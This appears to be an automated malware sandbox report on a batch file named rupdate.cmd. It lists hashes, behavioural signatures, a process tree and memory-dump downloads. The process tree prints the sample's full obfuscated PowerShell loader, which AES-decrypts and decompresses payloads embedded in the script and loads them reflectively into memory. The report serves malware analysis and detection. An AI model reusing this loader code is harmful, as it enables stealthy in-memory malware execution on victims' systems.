ff563d075c5fc7628d94f0d8e4c3d594bb1cefb40faa995211d5bd854f87573b

General

Target

rupdate.cmd
Size

61KB
MD5

e2c6aa50d199d28c6c91c31f4a0cecad
SHA1

281110edb18aa02b0f7bda95842bbfc89fa18df3
SHA256

ff563d075c5fc7628d94f0d8e4c3d594bb1cefb40faa995211d5bd854f87573b
SHA512

769f9fdff4bb299047733cc899303b1c4af2db0c72dba2aa13c7f1635c8256ee3e06a5ff46755f6c337fb4a87ae0c6d07288cc21fba84d2fa54800a8553a75cf
SSDEEP

1536:fvRba4CqbY73esiV0iqdvcl0odSVZnm+C:XsfesipWvUw2

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2868 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2868 powershell.exe

pid	process
2868	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2868	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2244 wrote to memory of 2248	2244	cmd.exe	cmd.exe
PID 2244 wrote to memory of 2248	2244	cmd.exe	cmd.exe
PID 2244 wrote to memory of 2248	2244	cmd.exe	cmd.exe
PID 2244 wrote to memory of 2396	2244	cmd.exe	cmd.exe
PID 2244 wrote to memory of 2396	2244	cmd.exe	cmd.exe
PID 2244 wrote to memory of 2396	2244	cmd.exe	cmd.exe
PID 2396 wrote to memory of 2372	2396	cmd.exe	cmd.exe
PID 2396 wrote to memory of 2372	2396	cmd.exe	cmd.exe
PID 2396 wrote to memory of 2372	2396	cmd.exe	cmd.exe
PID 2396 wrote to memory of 2564	2396	cmd.exe	cmd.exe
PID 2396 wrote to memory of 2564	2396	cmd.exe	cmd.exe
PID 2396 wrote to memory of 2564	2396	cmd.exe	cmd.exe
PID 2396 wrote to memory of 2868	2396	cmd.exe	powershell.exe
PID 2396 wrote to memory of 2868	2396	cmd.exe	powershell.exe
PID 2396 wrote to memory of 2868	2396	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\rupdate.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2244

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
2⤵
PID:2248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\rupdate.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
3⤵
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rupdate.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "
3⤵
PID:2564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2868-4-0x000000001B8A0000-0x000000001BB82000-memory.dmp

Filesize
2.9MB

Download
memory/2868-5-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2868-6-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-7-0x0000000002D80000-0x0000000002E00000-memory.dmp

Filesize
512KB

Download
memory/2868-8-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-9-0x0000000002D80000-0x0000000002E00000-memory.dmp

Filesize
512KB

Download
memory/2868-11-0x0000000002D80000-0x0000000002E00000-memory.dmp

Filesize
512KB

Download
memory/2868-10-0x0000000002D80000-0x0000000002E00000-memory.dmp

Filesize
512KB

Download
memory/2868-12-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-13-0x0000000002D80000-0x0000000002E00000-memory.dmp

Filesize
512KB

Download
memory/2868-14-0x0000000002D80000-0x0000000002E00000-memory.dmp

Filesize
512KB

Download
memory/2868-15-0x0000000002D80000-0x0000000002E00000-memory.dmp

Filesize
512KB

Download
memory/2868-16-0x0000000002D80000-0x0000000002E00000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads